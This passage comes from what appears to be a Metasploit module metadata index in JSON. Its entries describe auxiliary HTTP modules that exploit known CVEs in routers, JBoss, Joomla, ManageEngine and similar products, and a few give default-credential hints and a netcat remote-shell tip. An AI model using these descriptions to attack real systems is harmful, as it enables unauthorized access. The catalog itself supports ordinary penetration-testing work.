"description": "This module exploits a SQL injection vulnerability in the \"explorer\"\n action of \"miq_policy\" controller of the Red Hat CloudForms Management\n Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by\n changing the password of the target account to the specified password.",
"references": [
"CVE-2013-2050",
"CWE-89",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=959062"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/cfme_manageiq_evm_pass_reset",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/cnpilot_r_cmd_exec": {
"name": "Cambium cnPilot r200/r201 Command Execution as 'root'",
"full_name": "auxiliary/admin/http/cnpilot_r_cmd_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4 contain an undocumented backdoor 'root' shell. This shell is\n accessible via a specific URL to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.",
"references": [
"CVE-2017-5259",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:53:02 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/cnpilot_r_fpt": {
"name": "Cambium cnPilot r200/r201 File Path Traversal",
"full_name": "auxiliary/admin/http/cnpilot_r_fpt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. Affected\n versions - 4.3.3-R4 and prior.",
"references": [
"CVE-2017-5261",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:53:02 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_fpt",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/contentkeeper_fileaccess": {
"name": "ContentKeeper Web Appliance mimencode File Access",
"full_name": "auxiliary/admin/http/contentkeeper_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.",
"references": [
"OSVDB-54551",
"URL-http://www.aushack.com/200904-contentkeeper.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/http/contentkeeper_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/dlink_dir_300_600_exec_noauth": {
"name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution",
"full_name": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth",
"rank": 300,
"disclosure_date": "2013-02-04",
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.",
"references": [
"OSVDB-89861",
"EDB-24453",
"URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
"URL-http://www.s3cur1ty.de/home-network-horror-days",
"URL-http://www.s3cur1ty.de/m1adv2013-003"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_300_600_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/dlink_dir_645_password_extractor": {
"name": "D-Link DIR 645 Password Extractor",
"full_name": "auxiliary/admin/http/dlink_dir_645_password_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Roberto Paleari <roberto@greyhats.it>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.",
"references": [
"OSVDB-90733",
"BID-58231",
"PACKETSTORM-120591"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dir_645_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/dlink_dsl320b_password_extractor": {
"name": "D-Link DSL 320B Password Extractor",
"full_name": "auxiliary/admin/http/dlink_dsl320b_password_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits an authentication bypass vulnerability in D-Link DSL 320B\n <=v1.23. This vulnerability allows the credentials for the remote\n management interface to be extracted without authentication.",
"references": [
"EDB-25252",
"OSVDB-93013",
"URL-http://www.s3cur1ty.de/m1adv2013-018"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/dlink_dsl320b_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/foreman_openstack_satellite_priv_esc": {
"name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",
"full_name": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc",
"rank": 300,
"disclosure_date": "2013-06-06",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a mass assignment vulnerability in the 'create'\n action of 'users' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator\n account. For this exploit to work, your account must have 'create_users'\n permission (e.g., Manager role).",
"references": [
"BID-60835",
"CVE-2013-2113",
"CWE-915",
"OSVDB-94655",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=966804",
"URL-http://projects.theforeman.org/issues/2630"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/foreman_openstack_satellite_priv_esc",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/gitstack_rest": {
"name": "GitStack Unauthenticated REST API Requests",
"full_name": "auxiliary/admin/http/gitstack_rest",
"rank": 300,
"disclosure_date": "2018-01-15",
"type": "auxiliary",
"author": [
"Kacper Szurek",
"Jacob Robles"
],
"description": "This module exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. This module has been tested against GitStack v2.3.10.",
"references": [
"CVE-2018-5955",
"EDB-43777",
"EDB-44044"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-03-09 07:43:12 +0000",
"path": "/modules/auxiliary/admin/http/gitstack_rest.rb",
"is_install_path": true,
"ref_name": "admin/http/gitstack_rest",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/hp_web_jetadmin_exec": {
"name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution",
"full_name": "auxiliary/admin/http/hp_web_jetadmin_exec",
"rank": 300,
"disclosure_date": "2004-04-27",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.",
"references": [
"OSVDB-5798",
"BID-10224",
"EDB-294"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/hp_web_jetadmin_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/iis_auth_bypass": {
"name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",
"full_name": "auxiliary/admin/http/iis_auth_bypass",
"rank": 300,
"disclosure_date": "2010-07-02",
"type": "auxiliary",
"author": [
"Soroush Dalili",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.",
"references": [
"CVE-2010-2731",
"OSVDB-66160",
"MSB-MS10-065",
"URL-http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/iis_auth_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/intersil_pass_reset": {
"name": "Intersil (Boa) HTTPd Basic Authentication Password Reset",
"full_name": "auxiliary/admin/http/intersil_pass_reset",
"rank": 300,
"disclosure_date": "2007-09-10",
"type": "auxiliary",
"author": [
"Luca \"ikki\" Carettoni <luca.carettoni@securenetwork.it>",
"Claudio \"paper\" Merloni <claudio.merloni@securenetwork.it>",
"Max Dietz <maxwell.r.dietz@gmail.com>"
],
"description": "The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11\n allows basic authentication bypass when the user string is greater\n than 127 bytes long. The long string causes the password to be\n overwritten in memory, which enables the attacker to reset the\n password. In addition, the malicious attempt also may cause a\n denial-of-service condition.\n\n Please note that you must set the request URI to the directory that\n requires basic authentication in order to work properly.",
"references": [
"CVE-2007-4915",
"BID-25676",
"PACKETSTORM-59347"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-08 19:00:11 +0000",
"path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/intersil_pass_reset",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/iomega_storcenterpro_sessionid": {
"name": "Iomega StorCenter Pro NAS Web Authentication Bypass",
"full_name": "auxiliary/admin/http/iomega_storcenterpro_sessionid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "The Iomega StorCenter Pro Network Attached Storage device web interface uses sequentially incrementing session IDs,\n allowing a simple brute force attack to bypass authentication and gain administrative\n access.",
"references": [
"OSVDB-55586",
"CVE-2009-2367"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb",
"is_install_path": true,
"ref_name": "admin/http/iomega_storcenterpro_sessionid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/jboss_bshdeployer": {
"name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",
"full_name": "auxiliary/admin/http/jboss_bshdeployer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_bshdeployer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/jboss_deploymentfilerepository": {
"name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment",
"full_name": "auxiliary/admin/http/jboss_deploymentfilerepository",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module uses the DeploymentFileRepository class in the JBoss Application Server\n to deploy a JSP file which then deploys an arbitrary WAR file.",
"references": [
"CVE-2010-0738",
"OSVDB-64171",
"URL-http://www.redteam-pentesting.de/publications/jboss",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_deploymentfilerepository",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/jboss_seam_exec": {
"name": "JBoss Seam 2 Remote Command Execution",
"full_name": "auxiliary/admin/http/jboss_seam_exec",
"rank": 300,
"disclosure_date": "2010-07-19",
"type": "auxiliary",
"author": [
"guerrino di massa",
"Cristiano Maruti <cmaruti@gmail.com>"
],
"description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This module has also been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.",
"references": [
"CVE-2010-1871",
"OSVDB-66881"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/jboss_seam_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/joomla_registration_privesc": {
"name": "Joomla Account Creation and Privilege Escalation",
"full_name": "auxiliary/admin/http/joomla_registration_privesc",
"rank": 300,
"disclosure_date": "2016-10-25",
"type": "auxiliary",
"author": [
"Fabio Pires <fp@integrity.pt>",
"Filipe Reis <fr@integrity.pt>",
"Vitor Oliveira <vo@integrity.pt>"
],
"description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).",
"references": [
"CVE-2016-8869",
"CVE-2016-8870",
"URL-https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html",
"URL-https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html",
"URL-https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/joomla_registration_privesc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/kaseya_master_admin": {
"name": "Kaseya VSA Master Administrator Account Creation",
"full_name": "auxiliary/admin/http/kaseya_master_admin",
"rank": 300,
"disclosure_date": "2015-09-23",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.",
"references": [
"CVE-2015-6922",
"ZDI-15-448",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt",
"URL-https://seclists.org/bugtraq/2015/Sep/132"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/kaseya_master_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/katello_satellite_priv_esc": {
"name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization",
"full_name": "auxiliary/admin/http/katello_satellite_priv_esc",
"rank": 300,
"disclosure_date": "2014-03-24",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a missing authorization vulnerability in the\n \"update_roles\" action of \"users\" controller of Katello and Red Hat Satellite\n (Katello 1.5.0-14 and earlier) by changing the specified account to an\n administrator account.",
"references": [
"CVE-2013-2143",
"CWE-862",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=970849"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb",
"is_install_path": true,
"ref_name": "admin/http/katello_satellite_priv_esc",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/limesurvey_file_download": {
"name": "Limesurvey Unauthenticated File Download",
"full_name": "auxiliary/admin/http/limesurvey_file_download",
"rank": 300,
"disclosure_date": "2015-10-12",
"type": "auxiliary",
"author": [
"Pichaya Morimoto",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.",
"references": [
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20151022-0_Lime_Survey_multiple_critical_vulnerabilities_v10.txt",
"URL-https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015",
"URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/limesurvey_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/linksys_e1500_e2500_exec": {
"name": "Linksys E1500/E2500 Remote Command Execution",
"full_name": "auxiliary/admin/http/linksys_e1500_e2500_exec",
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind OS command injection vulnerability, there is no output for the\n executed command. A ping command against a system you control can be used for\n testing purposes.",
"references": [
"OSVDB-89912",
"BID-57760",
"EDB-24475",
"URL-http://www.s3cur1ty.de/m1adv2013-004"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_e1500_e2500_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": {
"name": "Linksys WRT120N tmUnblock Stack Buffer Overflow",
"full_name": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof",
"rank": 300,
"disclosure_date": "2014-02-19",
"type": "auxiliary",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.",
"references": [
"EDB-31758",
"OSVDB-103521",
"URL-http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_tmunblock_admin_reset_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/linksys_wrt54gl_exec": {
"name": "Linksys WRT54GL Remote Command Execution",
"full_name": "auxiliary/admin/http/linksys_wrt54gl_exec",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.",
"references": [
"URL-http://www.s3cur1ty.de/m1adv2013-01",
"URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl",
"EDB-24202",
"BID-57459",
"OSVDB-89421"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/linksys_wrt54gl_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/manage_engine_dc_create_admin": {
"name": "ManageEngine Desktop Central Administrator Account Creation",
"full_name": "auxiliary/admin/http/manage_engine_dc_create_admin",
"rank": 300,
"disclosure_date": "2014-12-31",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.",
"references": [
"CVE-2014-7862",
"OSVDB-116554",
"URL-https://seclists.org/fulldisclosure/2015/Jan/2",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt"
],
"platform": "",
"arch": "",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/manage_engine_dc_create_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/manageengine_dir_listing": {
"name": "ManageEngine Multiple Products Arbitrary Directory Listing",
"full_name": "auxiliary/admin/http/manageengine_dir_listing",
"rank": 300,
"disclosure_date": "2015-01-28",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.",
"references": [
"CVE-2014-7863",
"OSVDB-117696",
"URL-https://seclists.org/fulldisclosure/2015/Jan/114",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb",
"is_install_path": true,
"ref_name": "admin/http/manageengine_dir_listing",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/manageengine_file_download": {
"name": "ManageEngine Multiple Products Arbitrary File Download",
"full_name": "auxiliary/admin/http/manageengine_file_download",
"rank": 300,
"disclosure_date": "2015-01-28",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.",
"references": [
"CVE-2014-7863",
"OSVDB-117695",
"URL-https://seclists.org/fulldisclosure/2015/Jan/114",
"URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt"
],
